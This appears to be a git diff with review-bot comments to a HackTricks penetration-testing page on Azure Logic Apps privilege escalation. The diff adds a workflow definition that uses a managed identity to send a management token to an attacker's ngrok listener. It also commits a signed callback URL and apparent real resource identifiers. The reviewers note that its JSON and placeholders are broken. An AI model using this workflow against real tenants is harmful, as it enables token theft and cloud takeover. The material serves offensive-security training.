diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index a0bdd4d2a..fa05e2626 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,6 +1,6 @@ > [!TIP] > Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)\ > Learn & practice Az Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte) > >
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md index b70b229bb..302a4fc67 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md @@ -26,7 +26,50 @@ az logic workflow update \ --definition ``` -And after changing it, you can run it with: +Example definition of workflow with manual trigger to steal a management token of an assigned identity listeningn in a ngrok URL: + +```json +{ + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowDefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "triggers": { + "manual": { + "type": "Request", + "kind": "Http", + "inputs": { "schema": {} } + } + }, + "actions": { + "GetSecret": { + "type": "Http", + "inputs": { + "method": "GET", + "uri": "https://82fa-81-33-67-18.ngrok-free.app", + "authentication": { + "type": "ManagedServiceIdentity", + "audience": "https://management.azure.com/", + "identity": "/subscriptions/0c7db2d7-90ba-4106-8610-cdd8c06971fe/resourceGroups/-rg-10b8e451/providers/Microsoft.ManagedIdentity/userAssignedIdentities/uai-10b8e451", + } + } + }, + "Respond": { + "type": "Response", + "runAfter": { "GetSecret": ["Succeeded"] }, + "inputs": { + "statusCode": 200, + "body": "@body('GetSecret')" + } + } + }, + "outputs": {} + }, + "parameters": {} +} +``` + +And after modifying it, you can run it with: ```bash az rest \ 
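Review bot: the workflow definition added in this hunk is not valid JSON: inside `GetSecret.inputs.authentication` the line `"identity": "/subscriptions/0c7db2d7-.../userAssignedIdentities/uai-10b8e451",` ends with a trailing comma right before the closing `}`, so `az logic workflow update --definition` will reject the file; drop the comma. The same block also commits a real subscription ID, resource group, user-assigned identity name and ngrok hostname from a test environment; replace them with placeholders in the style the rest of the page uses (e.g. `<subscription-id>`, `<resource-group>`, `<uai-name>`, `<listener-url>`) so readers do not copy someone else's identifiers. The lead-in sentence should read "Example definition of a workflow with a manual trigger that steals a management token of an assigned identity by sending it to a listening ngrok URL" (fixes "listeningn in a ngrok URL"). Minor: `GetSecret` is a misleading action name since the step is an outbound HTTP request authenticated with the managed identity to the attacker's listener, not a secret lookup; a name such as `ExfilToken` would match the text, and the `Respond` step only echoes whatever the listener returns, which is optional for the theft itself.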
@@ -36,9 +79,19 @@ az rest \ --headers "Content-Type=application/json" ``` +OIf there is a manual trigger, you can get the callback URL and run it: + +```bash +az rest --method POST \ + --url "https://management.azure.com/subscriptions//resourceGroups/>/providers/Microsoft.Logic/workflows/>/triggers/manual/listCallbackUrl?api-version=2019-05-01" \ + --query "value" -o tsv + +curl -X POST "https://prod-11.centralus.logic.azure.com:443/workflows/02f4e715c50a42c58b683629ddb889f5/triggers/manual/paths/invoke?api-version=2019-05-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=5m1THJOCzEl6WoZyaont4i2A62PpSZhK3BtVAzYYTPY" +``` + ### Microsoft.Logic/workflows/write -With just this permission it's possible tochange the Authorization Policy, giving for example another tenant the capability to trigger the workflow: +With just this permission it's possible to change the Authorization Policy, giving for example another tenant the capability to trigger the workflow: ```bash az rest --method PUT \
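Review bot: the `az rest` URL in this hunk has broken placeholders: `subscriptions//resourceGroups/>/providers/Microsoft.Logic/workflows/>/triggers/manual/listCallbackUrl` has lost the `<subscription-id>`, `<resource-group>` and `<workflow-name>` tokens (the angle brackets appear to have been stripped), so the command cannot be run as written; restore them. The `curl` line below it commits a live callback URL including its `sig=` SAS signature; that signature is what authorizes the trigger call, so it should not be published, and a placeholder such as `curl -X POST "$(az rest ... --query value -o tsv)"` or `"<callback-url>"` would also make the two commands read as one flow. Also fix the typo "OIf there is a manual trigger" to "If there is a manual trigger". The existing-text fix ("tochange" to "to change") is fine.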